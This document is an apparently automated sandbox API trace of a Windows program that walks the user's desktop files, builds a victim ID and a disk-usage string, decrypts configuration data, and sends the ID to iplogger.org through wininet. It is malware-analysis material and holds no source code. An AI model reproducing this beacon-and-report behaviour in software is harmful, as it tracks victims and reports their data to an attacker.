SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0123.076] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0123.076] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0123.138] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0123.139] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0123.202] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0123.202] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0123.263] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0123.263] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0123.326] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0123.326] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0123.388] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0123.388] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0123.453] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0123.453] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0123.513] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0123.513] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0123.576] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0123.576] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0123.638] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0123.638] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0123.700] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0123.700] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0123.763] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0123.763] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0123.839] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0123.839] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0123.887] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0123.887] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0123.950] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0123.950] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0124.012] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0124.012] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0124.075] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0124.075] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0124.137] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0124.137] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0124.199] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0124.199] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0124.262] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0124.262] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0124.324] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0124.324] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0124.386] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0124.386] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0124.449] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0124.449] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0124.511] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0124.511] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0124.665] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0124.665] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0124.714] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0124.714] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0124.776] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0124.776] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0124.840] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0124.840] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0125.291] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0125.291] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0125.432] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0125.432] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0125.869] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0125.869] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0127.107] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0127.107] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0127.913] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0127.913] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0130.424] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0130.424] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0130.902] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0130.902] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0131.198] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0131.198] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0131.500] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0131.500] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0132.591] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0132.591] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0132.639] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0132.639] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0132.768] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0132.768] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0132.911] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0132.911] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0133.356] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0133.356] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0133.419] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0133.419] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0133.653] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0133.653] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0133.715] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0133.715] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0133.779] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0133.779] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0133.857] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0133.857] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0133.935] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0133.935] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0133.997] RtlTryEnterCriticalSection (CriticalSection=0x557470) returned 1 [0133.997] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0133.997] SetWindowTextW (hWnd=0x80162, lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ahtoY.flv") returned 1 [0134.074] RtlTryEnterCriticalSection (CriticalSection=0x557470) returned 1 [0134.074] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0134.074] SetWindowTextW (hWnd=0x80162, lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DqWuUGnY.avi") returned 1 [0134.125] RtlTryEnterCriticalSection (CriticalSection=0x557470) returned 1 [0134.125] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0134.125] SetWindowTextW (hWnd=0x80162, lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j-fJcx.m4a") returned 1 [0134.183] RtlTryEnterCriticalSection (CriticalSection=0x557470) returned 1 [0134.183] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0134.183] SetWindowTextW (hWnd=0x80162, lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ml-L2Mnu1hfDn3Ebw.png") returned 1 [0134.246] RtlTryEnterCriticalSection (CriticalSection=0x557470) returned 1 [0134.246] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0134.246] SetWindowTextW (hWnd=0x80162, lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p6WJ6Sf_Bnqv.bmp") returned 1 [0134.309] RtlTryEnterCriticalSection (CriticalSection=0x557470) returned 1 [0134.309] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0134.309] SetWindowTextW (hWnd=0x80162, lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uSOZ4TNyZhhaa Gl3.bmp") returned 1 [0134.370] RtlTryEnterCriticalSection (CriticalSection=0x557470) returned 1 [0134.371] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0134.371] SetWindowTextW (hWnd=0x80162, lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\ga 79jQ.csv") returned 1 [0134.433] RtlTryEnterCriticalSection (CriticalSection=0x557470) returned 1 [0134.433] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0134.433] SetWindowTextW (hWnd=0x80162, lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\NglnlXvJLQ haes0xIg.gif") returned 1 [0134.495] RtlTryEnterCriticalSection (CriticalSection=0x557470) returned 1 [0134.495] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0134.495] SetWindowTextW (hWnd=0x80162, lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\ohRy5R3Zh\\O7GsOEI.swf") returned 1 [0134.559] RtlTryEnterCriticalSection (CriticalSection=0x557470) returned 1 [0134.559] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0134.559] SetWindowTextW (hWnd=0x80162, lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\YK9azGU-728BZMlu.mp4") returned 1 [0134.620] RtlTryEnterCriticalSection (CriticalSection=0x557470) returned 1 [0134.620] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0134.620] SetWindowTextW (hWnd=0x80162, lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zgyGh8GT0arDFn7.mkv") returned 1 [0134.669] CloseHandle (hObject=0x114) returned 1 [0134.669] KillTimer (hWnd=0x5011c, uIDEvent=0x1) returned 1 [0134.669] KillTimer (hWnd=0x5011c, uIDEvent=0x2) returned 1 [0134.669] CloseHandle (hObject=0x118) returned 1 [0134.669] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1001) returned 0x4011e [0134.669] EnableWindow (hWnd=0x4011e, bEnable=1) returned 1 [0134.671] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1003) returned 0x50114 [0134.671] EnableWindow (hWnd=0x50114, bEnable=1) returned 1 [0134.672] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1002) returned 0x50116 [0134.672] EnableWindow (hWnd=0x50116, bEnable=0) returned 0 [0134.675] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1008) returned 0x16026e [0134.675] EnableWindow (hWnd=0x16026e, bEnable=1) returned 1 [0134.676] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1010) returned 0x202a4 [0134.676] EnableWindow (hWnd=0x202a4, bEnable=1) returned 1 [0134.676] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1012) returned 0x20276 [0134.676] EnableWindow (hWnd=0x20276, bEnable=1) returned 1 [0134.677] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1009) returned 0x20274 [0134.677] EnableWindow (hWnd=0x20274, bEnable=1) returned 1 [0134.678] wsprintfW (in: param_1=0x18f3f0, param_2="1. ID: %08X\r\n2. %s\r\n" | out: param_1="1. ID: 4B2E4630\r\n2. admin\r\n") returned 27 [0134.678] wsprintfW (in: param_1=0x18eb90, param_2="%s (%08X)%c %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%\r\n" | out: param_1="C: (9C354B42)L 0.00 gb (44)/0.00 gb (44)/100%\r\n") returned 47 [0134.678] wsprintfW (in: param_1=0x18f3f0, param_2="3. Total: %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%\r\n" | out: param_1="3. Total: 0.00 gb (44)/0.00 gb (44)/100%\r\n") returned 42 [0134.678] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1005) returned 0x4015e [0134.678] SetWindowTextW (hWnd=0x4015e, lpString="1. ID: 4B2E4630\r\n2. admin\r\n--------------------\r\n3. Total: 0.00 gb (44)/0.00 gb (44)/100%\r\nC: (9C354B42)L 0.00 gb (44)/0.00 gb (44)/100%\r\n") returned 1 [0134.681] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0134.681] SetWindowTextA (hWnd=0x80162, lpString="finished") returned 1 [0134.682] GetProcessHeap () returned 0x520000 [0134.682] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x53c5d0 [0134.682] CryptImportKey (in: hProv=0x534c10, pbData=0x18f758, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546448) returned 1 [0134.682] CryptDecrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x53c5d0, pdwDataLen=0x18f7d4 | out: pbData=0x53c5d0, pdwDataLen=0x18f7d4) returned 1 [0134.682] CryptDestroyKey (hKey=0x546448) returned 1 [0134.682] wsprintfA (in: param_1=0x18f7f0, param_2="%08X;%I64d.%02I64d" | out: param_1="4B2E4630;0.00") returned 13 [0134.682] GetProcessHeap () returned 0x520000 [0134.684] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x53c5a8 [0134.684] CryptImportKey (in: hProv=0x534c10, pbData=0x18f758, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546448) returned 1 [0134.684] CryptDecrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x53c5a8, pdwDataLen=0x18f7d4 | out: pbData=0x53c5a8, pdwDataLen=0x18f7d4) returned 1 [0134.684] CryptDestroyKey (hKey=0x546448) returned 1 [0134.684] GetProcessHeap () returned 0x520000 [0134.684] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x53c580 [0134.684] CryptImportKey (in: hProv=0x534c10, pbData=0x18f758, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546448) returned 1 [0134.684] CryptDecrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x53c580, pdwDataLen=0x18f7d4 | out: pbData=0x53c580, pdwDataLen=0x18f7d4) returned 1 [0134.685] CryptDestroyKey (hKey=0x546448) returned 1 [0134.685] GetProcessHeap () returned 0x520000 [0134.685] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x80) returned 0x546328 [0134.685] CryptImportKey (in: hProv=0x534c10, pbData=0x18f758, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546448) returned 1 [0134.685] CryptDecrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x546328, pdwDataLen=0x18f7d4 | out: pbData=0x546328, pdwDataLen=0x18f7d4) returned 1 [0134.685] CryptDestroyKey (hKey=0x546448) returned 1 [0134.685] GetProcessHeap () returned 0x520000 [0134.685] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x539f20 [0134.685] GetProcessHeap () returned 0x520000 [0134.685] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x544b60 [0134.685] GetProcessHeap () returned 0x520000 [0134.685] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x11) returned 0x539f00 [0134.685] GetProcessHeap () returned 0x520000 [0134.685] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x11) returned 0x539ee0 [0134.685] GetProcessHeap () returned 0x520000 [0134.685] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x544b78 [0134.685] GetProcessHeap () returned 0x520000 [0134.685] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x539ec0 [0134.685] GetProcessHeap () returned 0x520000 [0134.685] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x11) returned 0x539ea0 [0134.685] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x758d0000 [0136.967] GetProcAddress (hModule=0x758d0000, lpProcName="HttpOpenRequestA") returned 0x758f4c7d [0136.968] GetProcAddress (hModule=0x758d0000, lpProcName="HttpSendRequestA") returned 0x759618f8 [0136.968] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0136.968] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0136.968] GetProcAddress (hModule=0x758d0000, lpProcName="InternetConnectA") returned 0x758f49e9 [0136.968] GetProcessHeap () returned 0x520000 [0136.968] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x546328 | out: hHeap=0x520000) returned 1 [0136.968] GetProcessHeap () returned 0x520000 [0136.968] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0136.968] GetProcessHeap () returned 0x520000 [0136.968] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539f00 | out: hHeap=0x520000) returned 1 [0136.968] GetProcessHeap () returned 0x520000 [0136.968] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539ee0 | out: hHeap=0x520000) returned 1 [0136.968] GetProcessHeap () returned 0x520000 [0136.968] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b78 | out: hHeap=0x520000) returned 1 [0136.968] GetProcessHeap () returned 0x520000 [0136.968] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539ec0 | out: hHeap=0x520000) returned 1 [0136.968] GetProcessHeap () returned 0x520000 [0136.968] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539ea0 | out: hHeap=0x520000) returned 1 [0136.968] GetProcessHeap () returned 0x520000 [0136.968] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539f20 | out: hHeap=0x520000) returned 1 [0136.970] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0138.893] InternetConnectA (hInternet=0xcc0004, lpszServerName="iplogger.org", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0138.894] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="/13ySq7", lpszVersion=0x0, lpszReferrer="4B2E4630;0.00", lplpszAcceptTypes=0x0, dwFlags=0x80800000, dwContext=0x0) returned 0xcc000c [0140.405] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0149.770] GetLastError () returned 0x2 [0149.770] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0149.770] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0149.770] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0149.770] GetProcessHeap () returned 0x520000 [0149.770] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c5a8 | out: hHeap=0x520000) returned 1 [0149.770] GetProcessHeap () returned 0x520000 [0149.770] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c580 | out: hHeap=0x520000) returned 1 [0149.770] GetProcessHeap () returned 0x520000 [0149.770] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c5d0 | out: hHeap=0x520000) returned 1 [0149.972] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x405700, lpParameter=0x1, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f4 [0149.973] SetTimer (hWnd=0x5011c, nIDEvent=0x1, uElapse=0x32, lpTimerFunc=0x0) returned 0x1 [0149.973] SetTimer (hWnd=0x5011c, nIDEvent=0x2, uElapse=0x3a98, lpTimerFunc=0x0) returned 0x2 [0149.973] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5fc [0149.973] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1001) returned 0x4011e [0149.973] EnableWindow (hWnd=0x4011e, bEnable=0) returned 0 [0149.980] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1003) returned 0x50114 [0149.980] EnableWindow (hWnd=0x50114, bEnable=0) returned 0 [0149.981] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1002) returned 0x50116 [0149.981] EnableWindow (hWnd=0x50116, bEnable=1) returned 1 [0149.982] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1008) returned 0x16026e [0149.982] EnableWindow (hWnd=0x16026e, bEnable=0) returned 0 [0149.983] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1010) returned 0x202a4 [0149.983] EnableWindow (hWnd=0x202a4, bEnable=0) returned 0 [0149.984] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1012) returned 0x20276 [0149.984] EnableWindow (hWnd=0x20276, bEnable=0) returned 0 [0149.985] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1009) returned 0x20274 [0149.985] EnableWindow (hWnd=0x20274, bEnable=0) returned 0 [0150.033] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0150.033] SetWindowTextW (hWnd=0x80162, lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zgyGh8GT0arDFn7.mkv") returned 1 [0150.036] CloseHandle (hObject=0x5f4) returned 1 [0150.037] KillTimer (hWnd=0x5011c, uIDEvent=0x1) returned 1 [0150.037] KillTimer (hWnd=0x5011c, uIDEvent=0x2) returned 1 [0150.037] CloseHandle (hObject=0x5fc) returned 1 [0150.037] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1001) returned 0x4011e [0150.037] EnableWindow (hWnd=0x4011e, bEnable=1) returned 1 [0150.037] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1003) returned 0x50114 [0150.037] EnableWindow (hWnd=0x50114, bEnable=1) returned 1 [0150.038] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1002) returned 0x50116 [0150.038] EnableWindow (hWnd=0x50116, bEnable=0) returned 0 [0150.038] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1008) returned 0x16026e [0150.038] EnableWindow (hWnd=0x16026e, bEnable=1) returned 1 [0150.039] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1010) returned 0x202a4 [0150.039] EnableWindow (hWnd=0x202a4, bEnable=1) returned 1 [0150.039] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1012) returned 0x20276 [0150.039] EnableWindow (hWnd=0x20276, bEnable=1) returned 1 [0150.040] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1009) returned 0x20274 [0150.040] EnableWindow (hWnd=0x20274, bEnable=1) returned 1 [0150.040] wsprintfW (in: param_1=0x18f3f0, param_2="1. ID: %08X\r\n2. %s\r\n" | out: param_1="1. ID: 4B2E4630\r\n2. admin\r\n") returned 27 [0150.040] wsprintfW (in: param_1=0x18eb90, param_2="%s (%08X)%c %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%\r\n" | out: param_1="C: (9C354B42)L 0.00 gb (44)/0.00 gb (44)/100%\r\n") returned 47 [0150.040] wsprintfW (in: param_1=0x18f3f0, param_2="3. Total: %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%\r\n" | out: param_1="3. Total: 0.00 gb (44)/0.00 gb (44)/100%\r\n") returned 42 [0150.041] wsprintfW (in: param_1=0x18eb90, param_2="%s (%08X)%c %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%\r\n" | out: param_1="C: (9C354B42)L 0.00 gb (0)/0.00 gb (0)/0%\r\n") returned 43 [0150.041] wsprintfW (in: param_1=0x18f3f0, param_2="3. Total: %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%\r\n" | out: param_1="3. Total: 0.00 gb (0)/0.00 gb (0)/0%\r\n") returned 38 [0150.041] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1005) returned 0x4015e [0150.041] SetWindowTextW (hWnd=0x4015e, lpString="1. ID: 4B2E4630\r\n2. admin\r\n--------------------\r\n3. Total: 0.00 gb (44)/0.00 gb (44)/100%\r\nC: (9C354B42)L 0.00 gb (44)/0.00 gb (44)/100%\r\n--------------------\r\n3. Total: 0.00 gb (0)/0.00 gb (0)/0%\r\nC: (9C354B42)L 0.00 gb (0)/0.00 gb (0)/0%\r\n") returned 1 [0150.042] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0150.042] SetWindowTextA (hWnd=0x80162, lpString="finished") returned 1 [0150.043] GetProcessHeap () returned 0x520000 [0150.043] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x5a1318 [0150.043] CryptImportKey (in: hProv=0x534c10, pbData=0x18f758, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0150.043] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5a1318, pdwDataLen=0x18f7d4 | out: pbData=0x5a1318, pdwDataLen=0x18f7d4) returned 1 [0150.043] CryptDestroyKey (hKey=0x3f43588) returned 1 [0150.043] wsprintfA (in: param_1=0x18f7f0, param_2="%08X;%I64d.%02I64d" | out: param_1="4B2E4630;0.00") returned 13 [0150.043] GetProcessHeap () returned 0x520000 [0150.043] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x3f16530 [0150.043] CryptImportKey (in: hProv=0x534c10, pbData=0x18f758, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0150.043] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f16530, pdwDataLen=0x18f7d4 | out: pbData=0x3f16530, pdwDataLen=0x18f7d4) returned 1 [0150.043] CryptDestroyKey (hKey=0x3f43588) returned 1 [0150.043] GetProcessHeap () returned 0x520000 [0150.043] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x3f16c60 [0150.043] CryptImportKey (in: hProv=0x534c10, pbData=0x18f758, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0150.043] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f16c60, pdwDataLen=0x18f7d4 | out: pbData=0x3f16c60, pdwDataLen=0x18f7d4) returned 1 [0150.043] CryptDestroyKey (hKey=0x3f43588) returned 1 [0150.043] GetProcessHeap () returned 0x520000 [0150.043] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x80) returned 0x5809e0 [0150.043] CryptImportKey (in: hProv=0x534c10, pbData=0x18f758, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0150.043] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5809e0, pdwDataLen=0x18f7d4 | out: pbData=0x5809e0, pdwDataLen=0x18f7d4) returned 1 [0150.043] CryptDestroyKey (hKey=0x3f43588) returned 1 [0150.043] GetProcessHeap () returned 0x520000 [0150.043] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x548f58 [0150.043] GetProcessHeap () returned 0x520000 [0150.043] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x3f4ec38 [0150.043] GetProcessHeap () returned 0x520000 